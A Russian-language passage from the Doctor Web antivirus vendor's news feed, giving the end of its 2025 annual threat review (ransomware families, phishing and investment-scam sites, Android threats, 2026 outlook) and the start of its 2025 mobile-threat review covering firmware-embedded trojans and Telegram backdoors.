    &lt;dd&gt;Детектирование упакованной версии троянской программы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.289&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.289&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;По сравнению с 2024, в 2025 году в Службу технической поддержки «Доктор Веб» поступило на 35,98% меньше запросов от пользователей, которые пострадали от троянских программ-шифровальщиков. Динамика регистрации запросов на расшифровку файлов представлена на диаграмме ниже.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные шифровальщики в 2025 году&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, также известный как Mimic. При поиске целевых файлов для шифрования троян использует библиотеку &lt;span class="string"&gt;everything.dll&lt;/span&gt; легитимной программы Everything, предназначенной для мгновенного поиска файлов на Windows-компьютерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, основанный на исходном коде трояна-энкодера Conti. Шифрует файлы при помощи алгоритма ChaCha20. После ликвидации ряда управляющих серверов злоумышленников и раскрытия приватных RSA-ключей шифрования для некоторых модификаций этой вредоносной программы доступна расшифровка затронутых файлов.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, известный как Macop (один из вариантов этого трояна — &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Обладает небольшим размером, порядка 30-40 Кбайт. Отчасти это обусловлено тем, что троян не несет с собой сторонних криптографических библиотек, а для шифрования и генерации ключей пользуется исключительно CryptoAPI-функциями. Для шифрования файлов применяет алгоритм AES-256, а сами ключи шифруются RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, артефакты в котором указывают на причастность к его созданию хакерской группировки C77L.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян-вымогатель, имеющий несколько версий. Его актуальные модификации шифруют файлы алгоритмом AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;В 2025 году интернет-аналитики компании «Доктор Веб» наблюдали рост числа фишинговых сайтов, созданных для кражи учетных записей мессенджера Telegram. Злоумышленники использовали различные схемы: поддельные страницы аутентификации и авторизации, поддельные сообщения от службы поддержки Telegram, предупреждавшие о якобы выявленных нарушениях при использовании мессенджера и необходимости выполнить «проверку» учетной записи, и т. д.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример фишингового сайта, сообщающего о необходимости выполнить проверку учетной записи Telegram в связи с неким нарушением условий использования сервиса&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Подобные сайты создавались и для пользователей других сервисов, например игровых платформ, интернет-магазинов и т. д. Подделки могли выглядеть как настоящие интернет-ресурсы и предлагали войти в учетную запись. Если пользователи попадались на уловку, конфиденциальная информация оказывалась у злоумышленников.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт сервиса Steam демонстрирует фишинговую форму для ввода логина и пароля&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Пользователи снова сталкивались с различными вариантами мошеннических интернет-ресурсов, которые предлагали всевозможные подарки и бонусы, участие в неких «выгодных акциях». Распространение получили поддельные сайты российских маркетплейсов, где посетители якобы могли принять участие в розыгрыше призов. «Выигрыш» на них был запрограммирован, а для его «получения» от жертвы требовалась определенная оплата, например якобы в виде налога, затем — за доставку товара и его страховку. В других вариантах мошеннической схемы нужный товар якобы отсутствовал, но вместо него предлагался денежный эквивалент. Для «получения» денег пользователь также должен был совершить ряд платежей: в виде пошлины, страховки и т. п. Никакого приза жертва в итоге не получала.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример поддельного сайта маркетплейса, предлагающего принять участие в «розыгрыше призов»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вариантами подобных схем были ориентированные на жителей Великобритании поддельные сайты транспортных компаний. Они предлагали принять участие в розыгрыше транспортных карт, якобы приуроченных к определенному событию и позволяющих бесплатно пользоваться услугами общественного транспорта. После «выигрыша» мошенники просили жертв предоставить персональные данные и оплатить небольшую «комиссию».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт якобы от имени транспортной компании предлагает принять участие в «розыгрыше карты»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Актуальными остались всевозможные мошеннические сайты финансовой тематики. Популярными среди злоумышленников снова были ресурсы, предлагавшие зарабатывать торговлей на рынке с использованием автоматизированных систем на базе неких уникальных алгоритмов и технологий искусственного интеллекта. Подобные сайты создаются с ориентиром на жителей многих стран. Чаще всего на них запрашиваются персональные данные для регистрации «заявки» или «учетной записи», после чего информация попадает в руки злоумышленников, которые используют ее по своему усмотрению. В дальнейшем они могут перепродать данные или же продолжат заманивать потенциальную жертву в поддельный инвестиционный сервис, требуя внести деньги на «торговый» счет.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов, предлагавших доступ к «инвестиционной платформе» на базе технологий искусственного интеллекта, якобы имел отношение к корпорации Apple&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Многие такие сайты построены на базе похожих шаблонов в виде поддельного чата с «виртуальным помощником» или «сотрудником» той или иной компании, якобы от имени которой мошенники обращаются к потенциальной жертве. Пользователем предлагается ответить на ряд вопросов, после чего указать персональные данные.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;На одном из сайтов злоумышленники предлагали пользователям из Франции получить доступ к несуществующему автоматизированному торговому ПО TraderAI, который якобы позволит зарабатывать от 3 500€&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Один из ресурсов рекламировал инвестиционный сервис, якобы построенный непосредственно на базе мессенджера Telegram. Сайт обещал доход 10 000€ в месяц от автоматической торговли акциями мировых компаний «прямо в телефонном браузере».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт мошенников приглашает присоединиться к «платформе Telegram», которая якобы самостоятельно торгует акциями&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Злоумышленники также предлагали потенциальным жертвам заработать при помощи «торговых ботов», якобы созданных при участии крупных компаний и сервисов, таких как  Telegram, WhatsApp, TikTok и других.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример сайта, который приглашал воспользоваться несуществующим торговым ботом, якобы имеющим отношение к мессенджеру WhatsApp&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В течение 2025 года наши интернет-аналитики выявляли новые мошеннические сайты предлагавшие инвестировать в нефтегазовый сектор пользователям многих стран, включая Россию, страны СНГ и Европы. На таких сайтах у потенциальных жертв в большинстве случаев также запрашивается персональная информация: имя, фамилия, номер мобильного телефона, адрес электронной почты и т. д.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, ориентированный на граждан Киргизии, предлагает им «зарабатывать на нефти и газе», обещая крупный доход&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вновь появлялись мошеннические сайты, предлагавшие получить «государственную помощь» в виде выплат или компенсаций. Например, в российском сегменте интернета были распространены мошеннические ресурсы, якобы имеющие отношение к порталу «Госуслуги».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример мошеннического сайта, который якобы был связан с сервисом «Госуслуги» и обещал российским пользователям стабильные выплаты от государства и крупной нефтегазовой компании. Для «участия» в программе выплат у жертвы запрашивались персональные данные&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши специалисты также отметили появление очередных поддельных сайтов образовательных проектов. Они предлагали пользователям пройти различные обучающие курсы, чтобы повысить свою финансовую грамотность, освоить ту или иную профессию т. д. Для «доступа» к обучению у потенциальных жертв, как и во многих других подобных схемах, также запрашивалась персональная информация.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов предлагал освоить английский язык&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Интернет-аналитики «Доктор Веб» выявляли новые мошеннические сайты по продаже театральных билетов. На таких ресурсах злоумышленники предлагают потенциальным жертвам приобрести билеты по выгодным ценам, однако после «оплаты» пользователи их не получают.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример мошеннического сайта, продававшего несуществующие театральные билеты&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, распространение получили и новые поддельные сайты частных кинотеатров. Как и в случае с билетами в театр, мошенники предлагают потенциальным жертвам купить билеты в кино, но те в итоге лишь отдают свои деньги злоумышленникам.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт одного из частных кинотеатров&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Для мобильных устройств&lt;/h3&gt;

&lt;p&gt;Согласно статистике детектирований Dr.Web Security Space для мобильных устройств, в 2025 году пользователи Android чаще всего сталкивались с рекламными троянами &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, а также программами-подделками &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые вместо заявленной функциональности могут загружать различные веб-сайты, в том числе мошеннические и вредоносные. Отмечался рост активности троянских приложений &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;. Они представляют собой многофункциональные угрозы, которые злоумышленники встраивают в прошивку Android-устройств. Кроме того, наблюдался рост числа атак банковских троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. В то же время активность банкеров &lt;b&gt;Android.SpyMax&lt;/b&gt; наоборот снизилась.&lt;/p&gt;

&lt;p&gt;В минувшем году вирусописатели продолжили использовать различные техники защиты вредоносного ПО для ОС Android. Одной из них был метод конвертации DEX-кода в C-код (известен как DCC или DEX to C).&lt;/p&gt;

&lt;p&gt;Самыми распространенными нежелательными приложениями стали программы &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Они предлагают пользователям за виртуальные награды выполнять различные задания и обещают возможность конвертировать вознаграждение в настоящие деньги. Но самом деле в них такой возможности нет. Кроме того, на защищаемых устройствах часто детектировались приложения &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Первые имитируют работу антивирусов и обнаруживают несуществующие угрозы, предлагая «вылечить» заражение, купив полную версию ПО. Вторые представляют собой приложения, которые были модифицированы через популярный облачный сервис. При модификации к ним добавляются опасные системные разрешения и обфусцированный код, назначение которого нельзя проконтролировать.&lt;/p&gt;

&lt;p&gt;Программы, которые были модифицированы при помощи утилиты NP Manager (детектируются как &lt;b&gt;Tool.NPMod&lt;/b&gt;), стали самым распространенным потенциально опасным ПО. Утилита обфусцирует код модифицируемых приложений и позволяет обходить проверку их цифровой подписи. Наиболее активными рекламными программами в 2025 году были сторонние модификации WhatsApp (&lt;a href="https://vms.drweb.kz/search/?q=Adware.ModAd&amp;lng=kk"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), которые автоматически открывают рекламные ссылки при работе с мессенджером.&lt;/p&gt;

&lt;p&gt;В 2025 году были выявлены новые случаи заражения прошивок Android-устройств. Об одном из них наша компания уведомила в апреле. Злоумышленники предустановили вредоносное приложение &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; в системную область нескольких бюджетных моделей смартфонов и с его помощью похищали криптовалюту пользователей. Еще одним атакующим удалось внедрить опасных троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивку других моделей Android-смартфонов. Кроме того, были зафиксированы очередные случаи заражения прошивок TV-приставок под управлением Android новыми версиями трояна &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, которого наша компания &lt;a href="https://news.drweb.kz/show/?i=14900" target="_blank"&gt;обнаружила&lt;/a&gt; в 2024 году.&lt;/p&gt;

&lt;p&gt;В течение минувшего года антивирусная лаборатория «Доктор Веб» выявила ряд опасных вредоносных приложений. В апреле мы рассказали о трояне &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, который скрывался в модифицированной вирусописателями картографической программе Alpine Quest и атаковал российских военнослужащих. &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; передавал злоумышленникам данные о номере мобильного телефона и учетных записях, собирал контакты из телефонной книги, геолокацию зараженного устройства и сведения о хранящихся на нем файлах. Он также мог похищать определенные файлы по команде атакующих. Тех в первую очередь интересовали конфиденциальные документы, которые передавались через мессенджеры, а также файл журнала локаций программы Alpine Quest.&lt;/p&gt;

&lt;p&gt;В августе наши специалисты предупредили о бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, которого под видом антивируса злоумышленники распространяли через личные сообщения в мессенджерах. &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; крадет конфиденциальную информацию и позволяет следить за пользователями. Основной целью этого бэкдора стали сотрудники российского бизнеса.&lt;/p&gt;

&lt;p&gt;В октябре мы рассказали о многофункциональном бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Эта вредоносная программа также используется для кражи конфиденциальных данных, включая логины и пароли от Telegram, входящие СМС, переписку в мессенджере и данные из буфера обмена. При этом бэкдор позволяет злоумышленникам полностью управлять мессенджером и контролировать взломанную учетную запись Telegram жертвы. Для управления бэкдором киберпреступники использовали как C2-сервер, так и базу данных Redis, что ранее не встречалось в Android-угрозах. &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; преимущественно был нацелен на жителей Индонезии и Бразилии.&lt;/p&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в 2025 году читайте в нашем &lt;a href="https://news.drweb.kz/show/?i=15104" target="_blank"&gt;обзоре&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Перспективы и вероятные тенденции&lt;/h3&gt;

&lt;p&gt;В новом, 2026 году одной из наиболее распространенных угроз для пользователей, вероятно, останутся рекламные трояны, с помощью которых злоумышленники получают нелегальный доход. Стоит ожидать, что киберпреступники станут чаще использовать банковские троянские приложения, которые также позволяют обогащаться киберпреступникам.&lt;/p&gt;

&lt;p&gt;Возможен дальнейший рост популярности различных инструментов и методик, помогающих скрывать вредоносную активность. Среди них можно отметить использование упаковщиков и обфускаторов, применение вредоносных программ-дропперов и многоступенчатых загрузчиков, а также использование стеганографии для сокрытия полезной нагрузки. Кроме того, при создании вредоносного ПО киберпреступники, в том числе с небольшим опытом в программировании, все чаще будут прибегать к помощи ИИ-ассистентов. В результате появятся новые семейства вредоносных программ, а количество угроз возрастет.&lt;/p&gt;

&lt;p&gt;Под прицелом вновь окажутся государственные и корпоративные структуры, что выльется в очередные таргетированные атаки. Также вероятны новые случаи заражения прошивок Android-смартфонов, ТВ-приставок и других типов мобильных устройств, особенно в бюджетном сегменте. Сохранится активность интернет-мошенников.&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15104&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2025 год</title><link>https://news.drweb.kz/show/?i=15104&amp;lng=kk&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Главное&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;В 2025 году пользователи Android-устройств чаще всего сталкивались с рекламными троянами, а также с программами-подделками, которые используются в мошеннических целях.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Самым распространенным нежелательным ПО, как и годом ранее, стали приложения, в игровой форме предлагающие выполнять те или иные задания и получать за это виртуальные награды. Они обещают возможность конвертировать вознаграждение в настоящие деньги, но на самом деле такой возможности в программах не предусмотрено.&lt;/p&gt;

&lt;p&gt;Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений, которые были модифицированы при помощи утилиты NP Manager. Она обфусцирует и защищает код модифицируемых программ от анализа и обнаружения, а также позволяет обходить проверку цифровой подписи после их изменения. Наиболее часто детектируемыми рекламными программами стали неофициальные модификации мессенджера WhatsApp, которые автоматически открывают рекламные ссылки при работе с приложением.&lt;/p&gt;

&lt;p&gt;В минувшем году были зафиксированы новые случаи внедрения вредоносных программ в прошивку различных моделей Android-устройств. Об одном из них мы рассказали весной 2025 года. Киберпреступникам удалось предустановить троян &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; на несколько бюджетных моделей смартфонов и с его помощью похищать криптовалюту жертв.&lt;/p&gt;

&lt;p&gt;Также весной наши специалисты обнаружили троянскую программу &lt;a href="https://vms.drweb.kz/search/?q=Android.Spy.1292.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, которую вирусописатели встроили в одну из модифицированных версий картографического ПО Alpine Quest. Вредоносное приложение было нацелено на российских военнослужащих и применялось в целях кибершпионажа.&lt;/p&gt;

&lt;p&gt;В конце лета антивирусная лаборатория «Доктор Веб» проинформировала о бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.916.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, который распространялся через популярные мессенджеры. Злоумышленники использовали его для слежки за сотрудниками российских компаний и сбора их конфиденциальной информации.&lt;/p&gt;

&lt;p&gt;А уже осенью мы рассказали об опасном бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого киберпреступники встроили в модификации мессенджера Telegram X. Эта вредоносная программа позволяла взламывать учетные записи Telegram жертв и управлять самим мессенджером от имени пользователей.&lt;/p&gt;

&lt;p&gt;За минувшие 12 месяцев антивирусная лаборатория «Доктор Веб» выявила в каталоге Google Play более 180 угроз, которые в общей сложности были загружены свыше 2 165 000 раз. Среди них были различные варианты троянов, подписывающих пользователей на платные услуги, программы-подделки, которые применяются в мошеннических целях, а также новое рекламное и нежелательное ПО.&lt;/p&gt;

&lt;p&gt;В 2025 году вирусописатели продолжили использовать различные техники, направленные на усложнение анализа вредоносных Android-программ и обхода их детектирования антивирусами. Одним из популярных методов было конвертирование DEX-кода в C-код. Кроме того, наши вирусные аналитики отметили, что при создании вредоносного ПО злоумышленники применяют ИИ-ассистентов, которые помогают писать код.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Тенденции прошедшего года&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Рекламные трояны вновь стали наиболее распространенными Android-угрозами&lt;/li&gt;
        &lt;li&gt;Выросла популярность утилиты NP Manager, которая обфусцирует код модифицируемых Android-приложений и позволяет обходить проверку их цифровой подписи после модификации&lt;/li&gt;
        &lt;li&gt;Возросла активность банковских троянов&lt;/li&gt;
        &lt;li&gt;Выявлены новые случаи заражения прошивок Android-устройств&lt;/li&gt;
        &lt;li&gt;Киберпреступники продолжили использовать как уже известные техники для защиты вредоносных программ от детектирования и анализа, так и новые приемы&lt;/li&gt;
        &lt;li&gt;Вирусописатели активно применяли ИИ-помощников для написания кода вредоносных приложений&lt;/li&gt;
        &lt;li&gt;Появление новых угроз в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Наиболее интересные события 2025 года&lt;/h3&gt;

&lt;p&gt;В апреле минувшего года эксперты «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=15002" target="_blank"&gt;выявили&lt;/a&gt; масштабную кампанию по краже криптовалют у владельцев Android-устройств. Злоумышленники получили доступ к цепочке поставок ряда китайских производителей и внедрили в прошивку нескольких бюджетных моделей смартфонов троянскую программу &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;. Вирусописатели встроили ее в модифицированную версию мессенджера WhatsApp. Для модификации использовался инструмент &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;, позволяющий менять логику работы приложений без изменения их кода.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат атакующим. При этом троян скрывает подмену, и в таких сообщениях жертвам демонстрируются корректные кошельки. &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; также отправляет злоумышленникам все изображения в формате &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt; и &lt;em&gt;jpeg&lt;/em&gt; для поиска в них сохраненных мнемонических фраз, позволяющих получить доступ к криптокошелькам. Киберпреступники встроили &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; и в десятки других программ, среди которых были популярные приложения криптокошельков, сканеры QR-кодов и прочие мессенджеры, в том числе — Telegram. Эти модификации распространялись через вредоносные сайты.&lt;/p&gt;

